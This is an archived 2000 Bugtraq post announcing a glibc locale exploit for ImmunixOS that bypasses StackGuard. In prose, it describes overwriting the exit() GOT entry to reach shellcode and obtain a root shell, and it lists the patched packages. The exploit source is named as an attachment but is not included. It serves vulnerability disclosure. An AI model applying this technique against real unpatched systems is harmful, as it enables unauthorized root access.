[16837] in bugtraq
glibc/locale sploit for ImmunixOS
daemon@ATHENA.MIT.EDU (Mariusz Woloszyn)
Wed Sep 20 01:32:36 2000
I just developed the first publicly known sploit that bypasses StackGuard
protection in the real world. I decided to publish it as the patch for glibc
ImmunixOS is out. It's also the proof of concept described about a year ago
in our (my and Bulba's) Phrack article published in May this year.
[http://phrack.infonexus.com/search.phtml?view&article=p56-5]
The sploit is as simple as possible, it does not take any arguments and
produces a shell with euid==0. All addresses are fixed (stack and env).
The exploiting string overwrites the exit() GOT entry and makes it point to
our shellcode (it's sufficient if the stack is executable), just like
we described in the Phrack article a long time ago :)
The exploit won't work if glibc is patched (ImmunixOS patched glibc can be
found at:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/
glibc-2.1.3-21_StackGuard.i386.rpm
glibc-devel-2.1.3-21_StackGuard.i386.rpm
glibc-profile-2.1.3-21_StackGuard.i386.rpm
nscd-2.1.3-21_StackGuard.i386.rpm).
I would like to remind you that by using StackGuarded binaries you're still
adding an extra security level that can be bypassed ONLY under certain
circumstances!
Greetings go to all best Polish security specialists!
Regards,
--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland
[Attachment: 33_su.c]